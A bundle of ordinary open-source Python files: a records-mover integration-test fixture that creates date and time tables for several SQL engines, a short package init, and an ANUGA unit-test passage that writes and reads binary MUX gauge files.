6774ca62e780a4a2bc800ca7092c1619fee3f506 | 7,572 | py | Python | tests/integration/records/records_datetime_fixture.py | cwegrzyn/records-mover | e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2 | [
"Apache-2.0"
] | 36 | 2020-03-17T11:56:51.000Z | 2022-01-19T16:03:32.000Z | tests/integration/records/records_datetime_fixture.py | cwegrzyn/records-mover | e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2 | [
"Apache-2.0"
] | 60 | 2020-03-02T23:13:29.000Z | 2021-05-19T15:05:42.000Z | tests/integration/records/records_datetime_fixture.py | cwegrzyn/records-mover | e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2 | [
"Apache-2.0"
] | 4 | 2020-08-11T13:17:37.000Z | 2021-11-05T21:11:52.000Z | from records_mover.db.quoting import quote_schema_and_table
from records_mover.utils.retry import bigquery_retry
from .datetime_cases import (
SAMPLE_YEAR, SAMPLE_MONTH, SAMPLE_DAY,
SAMPLE_HOUR, SAMPLE_MINUTE, SAMPLE_SECOND, SAMPLE_OFFSET, SAMPLE_LONG_TZ
)
from sqlalchemy.engine import Engine
import logging
logger = logging.getLogger(__name__)
class RecordsDatetimeFixture:
def __init__(self, engine: Engine, schema_name: str, table_name: str):
self.engine = engine
self.schema_name = schema_name
self.table_name = table_name
def quote_schema_and_table(self, schema, table):
return quote_schema_and_table(self.engine, schema, table)
@bigquery_retry()
def drop_table_if_exists(self, schema, table):
sql = f"DROP TABLE IF EXISTS {self.quote_schema_and_table(schema, table)}"
self.engine.execute(sql)
def createDateTimeTzTable(self) -> None:
if self.engine.name == 'redshift':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d} {SAMPLE_LONG_TZ}'::TIMESTAMPTZ as timestamptz;
""" # noqa
elif self.engine.name == 'vertica':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d} {SAMPLE_LONG_TZ}'::TIMESTAMPTZ as timestamptz;
""" # noqa
elif self.engine.name == 'bigquery':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT cast('{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d} {SAMPLE_LONG_TZ}' AS TIMESTAMP) as timestamptz;
""" # noqa
elif self.engine.name == 'postgresql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d} {SAMPLE_LONG_TZ}'::TIMESTAMPTZ as "timestamptz";
""" # noqa
elif self.engine.name == 'mysql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT TIMESTAMP '{SAMPLE_YEAR}-{SAMPLE_MONTH:02d}-{SAMPLE_DAY:02d} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}.000000{SAMPLE_OFFSET}' AS "timestamptz";
""" # noqa
else:
raise NotImplementedError(f"Please teach me how to integration test {self.engine.name}")
self.engine.execute(create_tables)
def createDateTimeTable(self) -> None:
if self.engine.name == 'redshift':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}'::TIMESTAMP AS timestamp;
""" # noqa
elif self.engine.name == 'vertica':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}'::TIMESTAMP AS timestamp;
""" # noqa
elif self.engine.name == 'bigquery':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT cast('{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}' AS DATETIME) AS timestamp;
""" # noqa
elif self.engine.name == 'postgresql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}'::TIMESTAMP AS "timestamp";
""" # noqa
elif self.engine.name == 'mysql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT TIMESTAMP '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}' AS "timestamp";
""" # noqa
else:
raise NotImplementedError(f"Please teach me how to integration test {self.engine.name}")
self.engine.execute(create_tables)
@bigquery_retry()
def createDateTable(self) -> None:
if self.engine.name == 'redshift':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY}'::DATE AS date;
""" # noqa
elif self.engine.name == 'vertica':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY}'::DATE AS date;
""" # noqa
elif self.engine.name == 'bigquery':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT cast('{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY}' as DATE) AS date;
""" # noqa
elif self.engine.name == 'postgresql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY}'::DATE AS date;
""" # noqa
elif self.engine.name == 'mysql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT DATE '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY}' AS "date";
""" # noqa
else:
raise NotImplementedError(f"Please teach me how to integration test {self.engine.name}")
self.engine.execute(create_tables)
@bigquery_retry()
def createTimeTable(self):
if self.engine.name == 'redshift':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}' AS "time";
""" # noqa
elif self.engine.name == 'vertica':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}'::TIME AS "time";
""" # noqa
elif self.engine.name == 'bigquery':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT cast('{SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}' as TIME) AS time;
""" # noqa
elif self.engine.name == 'postgresql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}'::TIME AS "time";
""" # noqa
elif self.engine.name == 'mysql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT TIME '{SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}' AS "time";
""" # noqa
else:
raise NotImplementedError(f"Please teach me how to integration test {self.engine.name}")
self.engine.execute(create_tables)
    def drop_tables(self):
        logger.info('Dropping tables...')
        self.drop_table_if_exists(self.schema_name, f"{self.table_name}_frozen")
        self.drop_table_if_exists(self.schema_name, self.table_name)
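The engine dispatch above boils down to one DATE-literal expression per dialect. A standalone sketch of that mapping (hypothetical helper name; engine-name strings assumed to match the ones used in these tests):

```python
def date_literal(engine_name, y, m, d):
    # Render a DATE literal for each dialect exercised above:
    # the Postgres-family '::DATE' cast, BigQuery's CAST(... AS DATE),
    # and MySQL's standard DATE '...' literal syntax.
    iso = f"{y}-{m}-{d}"
    if engine_name in ('redshift', 'vertica', 'postgresql'):
        return f"'{iso}'::DATE"
    elif engine_name == 'bigquery':
        return f"cast('{iso}' as DATE)"
    elif engine_name == 'mysql':
        return f"DATE '{iso}'"
    raise NotImplementedError(engine_name)

expr = date_literal('postgresql', '2021', '01', '01')
```

The same shape covers the TIME literals below, with `::TIME`, `CAST(... AS TIME)`, and `TIME '...'` respectively.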
# === cfpq_data/graphs/__init__.py (viabzalov/CFPQ_Data, Apache-2.0) ===
from cfpq_data.graphs.generators import *
from cfpq_data.graphs.readwrite import *
from cfpq_data.graphs.utils import *
# === anuga/file/tests/test_mux.py (samcom12/anuga_core) ===
#from builtins import zip
#from builtins import map
#from builtins import range
import unittest
import tempfile
import numpy as num
import os
from struct import pack, unpack
from anuga.file.netcdf import NetCDFFile
from anuga.utilities.numerical_tools import ensure_numeric
from anuga.coordinate_transforms.redfearn import redfearn
from anuga.coordinate_transforms.geo_reference import Geo_reference
from anuga.file.mux import WAVEHEIGHT_MUX_LABEL, EAST_VELOCITY_LABEL, \
                           NORTH_VELOCITY_LABEL
from anuga.file.mux import WAVEHEIGHT_MUX2_LABEL, EAST_VELOCITY_MUX2_LABEL, \
                           NORTH_VELOCITY_MUX2_LABEL
from anuga.file.mux import read_mux2_py
from anuga.file_conversion.urs2sts import urs2sts
from anuga.file.urs import Read_urs
class Test_Mux(unittest.TestCase):
    def setUp(self):
        pass

    def tearDown(self):
        pass
    def write_mux(self, lat_long_points, time_step_count, time_step,
                  depth=None, ha=None, ua=None, va=None):
        """
        This will write 3 non-gridded mux files, for testing.
        If no quantities are passed in,
        ha and va quantities will be the Easting values.
        Depth and ua will be the Northing value.
        The mux file format has south as positive so
        this function will swap the sign for va.
        """
        #print "lat_long_points", lat_long_points
        #print "time_step_count",time_step_count
        #print "time_step",
        points_num = len(lat_long_points)
        lonlatdeps = []
        quantities = ['HA','UA','VA']
        mux_names = [WAVEHEIGHT_MUX_LABEL,
                     EAST_VELOCITY_LABEL,
                     NORTH_VELOCITY_LABEL]
        quantities_init = [[],[],[]]
        # urs binary is latitude fastest
        for point in lat_long_points:
            lat = point[0]
            lon = point[1]
            _ , e, n = redfearn(lat, lon)
            if depth is None:
                this_depth = n
            else:
                this_depth = depth
            if ha is None:
                this_ha = e
            else:
                this_ha = ha
            if ua is None:
                this_ua = n
            else:
                this_ua = ua
            if va is None:
                this_va = e
            else:
                this_va = va
            lonlatdeps.append([lon, lat, this_depth])
            quantities_init[0].append(this_ha) # HA
            quantities_init[1].append(this_ua) # UA
            quantities_init[2].append(this_va) # VA
        file_handle, base_name = tempfile.mkstemp("")
        os.close(file_handle)
        os.remove(base_name)
        files = []
        for i, q in enumerate(quantities):
            quantities_init[i] = ensure_numeric(quantities_init[i])
            #print "HA_init", HA_init
            q_time = num.zeros((time_step_count, points_num), num.float64)
            for time in range(time_step_count):
                q_time[time,:] = quantities_init[i] #* time * 4
            #Write C files
            columns = 3 # long, lat , depth
            file = base_name + mux_names[i]
            #print "base_name file",file
            f = open(file, 'wb')
            files.append(file)
            f.write(pack('i',points_num))
            f.write(pack('i',time_step_count))
            f.write(pack('f',time_step))
            #write lat/long info
            for lonlatdep in lonlatdeps:
                for value in lonlatdep:  # renamed from 'float' to avoid shadowing the builtin
                    f.write(pack('f',value))
            # Write quantity info
            for time in range(time_step_count):
                for point_i in range(points_num):
                    f.write(pack('f',q_time[time,point_i]))
                    #print " mux_names[i]", mux_names[i]
                    #print "f.write(pack('f',q_time[time,i]))", q_time[time,point_i]
            f.close()
        return base_name, files
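The simple mux header written above is just two native-endian 4-byte ints followed by a 4-byte float. A minimal, self-contained round-trip sketch (hypothetical helper names, assuming the same `'i'`/`'f'` packing `write_mux` uses):

```python
import os
import struct
import tempfile

def write_header(path, points_num, time_step_count, time_step):
    # Mirror of the header written by write_mux: two ints and a float.
    with open(path, 'wb') as f:
        f.write(struct.pack('i', points_num))
        f.write(struct.pack('i', time_step_count))
        f.write(struct.pack('f', time_step))

def read_header(path):
    # Unpack in the same native order and sizes the writer used.
    with open(path, 'rb') as f:
        points_num = struct.unpack('i', f.read(4))[0]
        time_step_count = struct.unpack('i', f.read(4))[0]
        time_step = struct.unpack('f', f.read(4))[0]
    return points_num, time_step_count, time_step

fd, path = tempfile.mkstemp()
os.close(fd)
write_header(path, 4, 3, 2.0)
header = read_header(path)
os.remove(path)
```

Note the float value only survives exactly when it is representable in single precision (2.0 is; 0.2 is not), which is exactly why the header checks further down compare against a single-precision epsilon.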
    def delete_mux(self, files):
        for file in files:
            try:
                os.remove(file)
            except OSError:
                pass
    def write_mux2(self, lat_long_points, time_step_count, time_step,
                   first_tstep, last_tstep,
                   depth=None, ha=None, ua=None, va=None):
        """
        This will write 3 non-gridded mux files, for testing.
        If no quantities are passed in,
        ha and va quantities will be the Easting values.
        Depth and ua will be the Northing value.
        """
        #print "lat_long_points", lat_long_points
        #print "time_step_count",time_step_count
        #print "time_step",
        #irrelevant header information
        ig=ilon=ilat=0
        mcolat=mcolon=centerlat=centerlon=offset=az=baz=id=0.0
        points_num = len(lat_long_points)
        latlondeps = []
        quantities = ['HA','UA','VA']
        mux_names = [WAVEHEIGHT_MUX2_LABEL,
                     EAST_VELOCITY_MUX2_LABEL,
                     NORTH_VELOCITY_MUX2_LABEL]
        msg = 'first_tstep and last_tstep arrays must have same length as number of points'
        assert len(first_tstep)==points_num, msg
        assert len(last_tstep)==points_num, msg
        if depth is not None:
            depth=ensure_numeric(depth)
            assert len(depth)==points_num
        if ha is not None:
            ha=ensure_numeric(ha)
            assert ha.shape==(points_num,time_step_count)
        if ua is not None:
            ua=ensure_numeric(ua)
            assert ua.shape==(points_num,time_step_count)
        if va is not None:
            va=ensure_numeric(va)
            assert va.shape==(points_num,time_step_count)
        quantities_init = [[],[],[]]
        # urs binary is latitude fastest
        for i,point in enumerate(lat_long_points):
            lat = point[0]
            lon = point[1]
            _ , e, n = redfearn(lat, lon)
            if depth is None:
                this_depth = n
            else:
                this_depth = depth[i]
            latlondeps.append([lat, lon, this_depth])
            if ha is None:
                this_ha = e
                quantities_init[0].append(num.ones(time_step_count,float)*this_ha) # HA
            else:
                quantities_init[0].append(ha[i])
            if ua is None:
                this_ua = n
                quantities_init[1].append(num.ones(time_step_count,float)*this_ua) # UA
            else:
                quantities_init[1].append(ua[i])
            if va is None:
                this_va = e
                quantities_init[2].append(num.ones(time_step_count,float)*this_va) # VA
            else:
                quantities_init[2].append(-va[i]) # South is negative in MUX
        file_handle, base_name = tempfile.mkstemp("write_mux2")
        os.close(file_handle)
        os.remove(base_name)
        files = []
        for i, q in enumerate(quantities):
            q_time = num.zeros((time_step_count, points_num), float)
            quantities_init[i] = ensure_numeric(quantities_init[i])
            for time in range(time_step_count):
                #print i, q, time, quantities_init[i][:,time]
                q_time[time,:] = quantities_init[i][:,time]
                #print i, q, time, q_time[time, :]
            #Write C files
            columns = 3 # long, lat , depth
            file = base_name + mux_names[i]
            #print 'base_name file', file
            f = open(file, 'wb')
            files.append(file)
            f.write(pack('i',points_num))
            #write mux 2 header
            for latlondep in latlondeps:
                f.write(pack('f',latlondep[0]))
                f.write(pack('f',latlondep[1]))
                f.write(pack('f',mcolat))
                f.write(pack('f',mcolon))
                f.write(pack('i',ig))
                f.write(pack('i',ilon))
                f.write(pack('i',ilat))
                f.write(pack('f',latlondep[2]))
                f.write(pack('f',centerlat))
                f.write(pack('f',centerlon))
                f.write(pack('f',offset))
                f.write(pack('f',az))
                f.write(pack('f',baz))
                f.write(pack('f',time_step))
                f.write(pack('i',time_step_count))
                for j in range(4): # identifier
                    f.write(pack('f',id))
            #first_tstep=1
            #last_tstep=time_step_count
            for i,latlondep in enumerate(latlondeps):
                f.write(pack('i',first_tstep[i]))
            for i,latlondep in enumerate(latlondeps):
                f.write(pack('i',last_tstep[i]))
            # Find when first station starts recording
            min_tstep = min(first_tstep)
            # Find when all stations have stopped recording
            max_tstep = max(last_tstep)
            #for time in range(time_step_count):
            for time in range(min_tstep-1,max_tstep):
                f.write(pack('f',time*time_step))
                for point_i in range(points_num):
                    if time+1>=first_tstep[point_i] and time+1<=last_tstep[point_i]:
                        #print 'writing', time, point_i, q_time[time, point_i]
                        f.write(pack('f', q_time[time, point_i]))
            f.close()
        return base_name, files
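The per-station recording window above is the subtle part of the mux2 layout: a sample is only written for station `i` at global step `time` when `first_tstep[i] <= time+1 <= last_tstep[i]`. A standalone sketch of that condition (hypothetical helper, plain Python):

```python
def recorded_steps(first_tstep, last_tstep):
    # For each global timestep in the written window, list the station
    # indices that contribute a sample, mirroring the condition
    # first_tstep[i] <= time+1 <= last_tstep[i] used by write_mux2.
    min_tstep = min(first_tstep)   # when the first station starts
    max_tstep = max(last_tstep)    # when the last station stops
    window = {}
    for time in range(min_tstep - 1, max_tstep):
        window[time] = [i for i in range(len(first_tstep))
                        if first_tstep[i] <= time + 1 <= last_tstep[i]]
    return window

# Three stations: starts at steps 1, 2, 1; ends at steps 3, 3, 2.
w = recorded_steps([1, 2, 1], [3, 3, 2])
```

Because the record count varies per step, a reader must apply the same window logic to know how many floats follow each timestamp.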
    def test_urs2sts_read_mux2_pyI(self):
        """test_urs2sts_read_mux2_pyI(self):
        Constant stage, momentum at each gauge
        """
        tide = 1
        time_step_count = 3
        time_step = 2
        lat_long_points = [(-21.5,114.5), (-21,114.5), (-21.5,115), (-21.,115.)]
        n = len(lat_long_points)
        first_tstep = num.ones(n,int)
        last_tstep = time_step_count*num.ones(n,int)
        depth = 20*num.ones(n,float)
        ha = 2*num.ones((n,time_step_count),float)
        ua = 5*num.ones((n,time_step_count),float)
        va = -10*num.ones((n,time_step_count),float)
        #-ve added to take into account mux file format where south is positive.
        base_name, files = self.write_mux2(lat_long_points,
                                           time_step_count, time_step,
                                           first_tstep, last_tstep,
                                           depth=depth,
                                           ha=ha,
                                           ua=ua,
                                           va=va)
        weights = num.ones(1, float)
        #ensure that files are indeed mux2 files
        times, latitudes, longitudes, elevation, stage, starttime = read_mux2_py([files[0]], weights)
        ua_times, ua_latitudes, ua_longitudes, ua_elevation, xvelocity, starttime_ua = read_mux2_py([files[1]], weights)
        msg = 'ha and ua have different gauge meta data'
        assert num.allclose(times, ua_times) and \
               num.allclose(latitudes, ua_latitudes) and \
               num.allclose(longitudes, ua_longitudes) and \
               num.allclose(elevation, ua_elevation) and \
               num.allclose(starttime, starttime_ua), msg
        va_times, va_latitudes, va_longitudes, va_elevation, yvelocity, starttime_va = read_mux2_py([files[2]], weights)
        msg = 'ha and va have different gauge meta data'
        assert num.allclose(times, va_times) and \
               num.allclose(latitudes, va_latitudes) and \
               num.allclose(longitudes, va_longitudes) and \
               num.allclose(elevation, va_elevation) and \
               num.allclose(starttime, starttime_va), msg
        self.delete_mux(files)
        msg = 'time array has incorrect length'
        assert times.shape[0]==time_step_count, msg
        msg = 'time array is incorrect'
        #assert allclose(times,time_step*num.arange(1,time_step_count+1)),msg
        assert num.allclose(times, time_step*num.arange(time_step_count)), msg
        msg = 'Incorrect gauge positions returned'
        for i,point in enumerate(lat_long_points):
            assert num.allclose(latitudes[i],point[0]) and num.allclose(longitudes[i],point[1]), msg
        msg = 'Incorrect gauge depths returned'
        assert num.allclose(elevation, -depth), msg
        msg = 'incorrect gauge height time series returned'
        assert num.allclose(stage, ha), msg
        msg = 'incorrect gauge ua time series returned'
        assert num.allclose(xvelocity, ua), msg
        msg = 'incorrect gauge va time series returned'
        assert num.allclose(yvelocity, -va), msg
    def test_urs2sts_read_mux2_pyII(self):
        """Spatially varying stage
        """
        tide = 1
        time_step_count = 3
        time_step = 2
        lat_long_points = [(-21.5,114.5), (-21,114.5), (-21.5,115), (-21.,115.)]
        n = len(lat_long_points)
        first_tstep = num.ones(n,int)
        last_tstep = (time_step_count)*num.ones(n,int)
        depth = 20*num.ones(n,float)
        ha = 2*num.ones((n,time_step_count),float)
        ha[0] = num.arange(0,time_step_count)+1
        ha[1] = time_step_count-num.arange(1,time_step_count+1)
        ha[1] = num.arange(time_step_count,2*time_step_count)
        ha[2] = num.arange(2*time_step_count,3*time_step_count)
        ha[3] = num.arange(3*time_step_count,4*time_step_count)
        ua = 5*num.ones((n,time_step_count),float)
        va = -10*num.ones((n,time_step_count),float)
        #-ve added to take into account mux file format where south is positive.
        base_name, files = self.write_mux2(lat_long_points,
                                           time_step_count, time_step,
                                           first_tstep, last_tstep,
                                           depth=depth,
                                           ha=ha,
                                           ua=ua,
                                           va=va)
        weights = num.ones(1, float)
        #ensure that files are indeed mux2 files
        times, latitudes, longitudes, elevation, stage, starttime = read_mux2_py([files[0]], weights)
        ua_times, ua_latitudes, ua_longitudes, ua_elevation, xvelocity, starttime_ua = read_mux2_py([files[1]], weights)
        msg = 'ha and ua have different gauge meta data'
        assert num.allclose(times, ua_times) and \
               num.allclose(latitudes, ua_latitudes) and \
               num.allclose(longitudes, ua_longitudes) and \
               num.allclose(elevation, ua_elevation) and \
               num.allclose(starttime, starttime_ua), msg
        va_times, va_latitudes, va_longitudes, va_elevation, yvelocity, starttime_va = read_mux2_py([files[2]], weights)
        msg = 'ha and va have different gauge meta data'
        assert num.allclose(times, va_times) and \
               num.allclose(latitudes, va_latitudes) and \
               num.allclose(longitudes, va_longitudes) and \
               num.allclose(elevation, va_elevation) and \
               num.allclose(starttime, starttime_va), msg
        self.delete_mux(files)
        #msg = 'time array has incorrect length'
        #assert times.shape[0]==time_step_count,msg
        #msg = 'time array is incorrect'
        #assert allclose(times,time_step*num.arange(1,time_step_count+1)),msg
        msg = 'Incorrect gauge positions returned'
        for i,point in enumerate(lat_long_points):
            assert num.allclose(latitudes[i],point[0]) and num.allclose(longitudes[i],point[1]), msg
        msg = 'Incorrect gauge depths returned'
        assert num.allclose(elevation, -depth), msg
        msg = 'incorrect gauge height time series returned'
        assert num.allclose(stage, ha), msg
        msg = 'incorrect gauge ua time series returned'
        assert num.allclose(xvelocity, ua), msg
        msg = 'incorrect gauge va time series returned'
        assert num.allclose(yvelocity, -va), msg # South is positive in MUX
    def test_urs2sts_read_mux2_pyIII(self):
        """Varying start and finish times
        """
        tide = 1
        time_step_count = 3
        time_step = 2
        lat_long_points = [(-21.5,114.5), (-21,114.5), (-21.5,115), (-21.,115.)]
        n = len(lat_long_points)
        first_tstep = num.ones(n,int)
        first_tstep[0] += 1
        first_tstep[2] += 1
        last_tstep = (time_step_count)*num.ones(n,int)
        last_tstep[0] -= 1
        depth = 20*num.ones(n,float)
        ha = 2*num.ones((n,time_step_count),float)
        ha[0] = num.arange(0,time_step_count)
        ha[1] = num.arange(time_step_count,2*time_step_count)
        ha[2] = num.arange(2*time_step_count,3*time_step_count)
        ha[3] = num.arange(3*time_step_count,4*time_step_count)
        ua = 5*num.ones((n,time_step_count),float)
        va = -10*num.ones((n,time_step_count),float)
        #-ve added to take into account mux file format where south is positive.
        base_name, files = self.write_mux2(lat_long_points,
                                           time_step_count, time_step,
                                           first_tstep, last_tstep,
                                           depth=depth,
                                           ha=ha,
                                           ua=ua,
                                           va=va)
        weights = num.ones(1, float)
        #ensure that files are indeed mux2 files
        times, latitudes, longitudes, elevation, stage, starttime = read_mux2_py([files[0]], weights)
        ua_times, ua_latitudes, ua_longitudes, ua_elevation, xvelocity, starttime_ua = read_mux2_py([files[1]], weights)
        msg = 'ha and ua have different gauge meta data'
        assert num.allclose(times, ua_times) and \
               num.allclose(latitudes, ua_latitudes) and \
               num.allclose(longitudes, ua_longitudes) and \
               num.allclose(elevation, ua_elevation) and \
               num.allclose(starttime, starttime_ua), msg
        va_times, va_latitudes, va_longitudes, va_elevation, yvelocity, starttime_va = read_mux2_py([files[2]], weights)
        msg = 'ha and va have different gauge meta data'
        assert num.allclose(times, va_times) and \
               num.allclose(latitudes, va_latitudes) and \
               num.allclose(longitudes, va_longitudes) and \
               num.allclose(elevation, va_elevation) and \
               num.allclose(starttime, starttime_va), msg
        self.delete_mux(files)
        #msg = 'time array has incorrect length'
        #assert times.shape[0]==time_step_count,msg
        #msg = 'time array is incorrect'
        #assert allclose(times,time_step*num.arange(1,time_step_count+1)),msg
        msg = 'Incorrect gauge positions returned'
        for i,point in enumerate(lat_long_points):
            assert num.allclose(latitudes[i],point[0]) and num.allclose(longitudes[i],point[1]), msg
        # Set original data used to write mux file to be zero when gauges are
        # not recording
        ha[0][0] = 0.0
        ha[0][time_step_count-1] = 0.0
        ha[2][0] = 0.0
        ua[0][0] = 0.0
        ua[0][time_step_count-1] = 0.0
        ua[2][0] = 0.0
        va[0][0] = 0.0
        va[0][time_step_count-1] = 0.0
        va[2][0] = 0.0
        msg = 'Incorrect gauge depths returned'
        assert num.allclose(elevation, -depth), msg
        msg = 'incorrect gauge height time series returned'
        assert num.allclose(stage, ha), msg
        msg = 'incorrect gauge ua time series returned'
        assert num.allclose(xvelocity, ua), msg
        msg = 'incorrect gauge va time series returned'
        assert num.allclose(yvelocity, -va), msg # South is positive in mux
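The hand-zeroing in the test above (gauges 0 and 2 start late, gauge 0 ends early) is an instance of a general rule: samples outside each gauge's `[first_tstep, last_tstep]` window read back as zero. A standalone sketch of that masking (hypothetical helper, plain Python lists so it is self-contained):

```python
def mask_to_window(q, first_tstep, last_tstep):
    # q: list of per-gauge timeseries. Zero every sample whose 1-based
    # step index falls outside [first_tstep[i], last_tstep[i]],
    # mirroring what the test does by hand for specific gauges.
    out = []
    for i, series in enumerate(q):
        out.append([v if first_tstep[i] <= j + 1 <= last_tstep[i] else 0.0
                    for j, v in enumerate(series)])
    return out

# Gauge 0 only records at step 2; gauge 1 records for all three steps.
masked = mask_to_window([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], [2, 1], [2, 3])
```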
    def test_read_mux_platform_problem1(self):
        """test_read_mux_platform_problem1
        This is to test a situation where read_mux returned
        wrong values Win32
        This test passes on Windows but test_read_mux_platform_problem2
        does not
        """
        from anuga.file.urs_ext import read_mux2
        verbose = False
        tide = 1.5
        time_step_count = 10
        time_step = 0.2
        times_ref = num.arange(0, time_step_count*time_step, time_step)
        lat_long_points = [(-21.5,114.5), (-21,114.5), (-21.5,115), (-21.,115.), (-22., 117.)]
        n = len(lat_long_points)
        # Create different timeseries starting and ending at different times
        first_tstep = num.ones(n, int)
        first_tstep[0] += 2 # Point 0 starts at 2
        first_tstep[1] += 4 # Point 1 starts at 4
        first_tstep[2] += 3 # Point 2 starts at 3
        last_tstep = (time_step_count)*num.ones(n,int)
        last_tstep[0] -= 1 # Point 0 ends 1 step early
        last_tstep[1] -= 2 # Point 1 ends 2 steps early
        last_tstep[4] -= 3 # Point 4 ends 3 steps early
        # Create varying elevation data (positive values for seafloor)
        gauge_depth = 20*num.ones(n,float)
        for i in range(n):
            gauge_depth[i] += i**2
        # Create data to be written to first mux file
        ha0 = 2*num.ones((n,time_step_count),float)
        ha0[0] = num.arange(0,time_step_count)
        ha0[1] = num.arange(time_step_count,2*time_step_count)
        ha0[2] = num.arange(2*time_step_count,3*time_step_count)
        ha0[3] = num.arange(3*time_step_count,4*time_step_count)
        ua0 = 5*num.ones((n,time_step_count),float)
        va0 = -10*num.ones((n,time_step_count),float)
        # Ensure data used to write mux file to be zero when gauges are
        # not recording
        for i in range(n):
            # For each point
            for j in list(range(0, first_tstep[i]-1)) + list(range(last_tstep[i], time_step_count)):
                # For timesteps before and after recording range
                ha0[i][j] = ua0[i][j] = va0[i][j] = 0.0
        # Write first mux file to be combined by urs2sts
        base_nameI, filesI = self.write_mux2(lat_long_points,
                                             time_step_count, time_step,
                                             first_tstep, last_tstep,
                                             depth=gauge_depth,
                                             ha=ha0,
                                             ua=ua0,
                                             va=va0)
        # Create ordering file
        permutation = ensure_numeric([4,0,2])
        _, ordering_filename = tempfile.mkstemp('')
        order_fid = open(ordering_filename, 'w')
        order_fid.write('index, longitude, latitude\n')
        for index in permutation:
            order_fid.write('%d, %f, %f\n' %(index,
                                             lat_long_points[index][1],
                                             lat_long_points[index][0]))
        order_fid.close()
        # -------------------------------------
        # Now read files back and check values
        weights = ensure_numeric([1.0])
        # For each quantity read the associated list of source mux2 file with
        # extension associated with that quantity
        file_params = -1*num.ones(3,float) #[nsta,dt,nt]
        OFFSET = 5
        for j, file in enumerate(filesI):
            data = read_mux2(1, [str(file).encode()], weights, file_params, permutation, verbose)
            number_of_selected_stations = data.shape[0]
            # Index where data ends and parameters begin
            parameters_index = data.shape[1]-OFFSET
            for i in range(number_of_selected_stations):
                if j == 0: assert num.allclose(data[i][:parameters_index], ha0[permutation[i], :])
                if j == 1: assert num.allclose(data[i][:parameters_index], ua0[permutation[i], :])
                if j == 2: assert num.allclose(data[i][:parameters_index], -va0[permutation[i], :])
        self.delete_mux(filesI)
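The permutation `[4, 0, 2]` above both selects and reorders stations: row `i` of the data returned by `read_mux2` corresponds to source station `permutation[i]`. The selection itself can be sketched in isolation (hypothetical helper, plain Python):

```python
def select_stations(rows, permutation):
    # Reorder/select per-station timeseries the way the ordering
    # file [4, 0, 2] does for read_mux2: output row i is input
    # row permutation[i].
    return [rows[p] for p in permutation]

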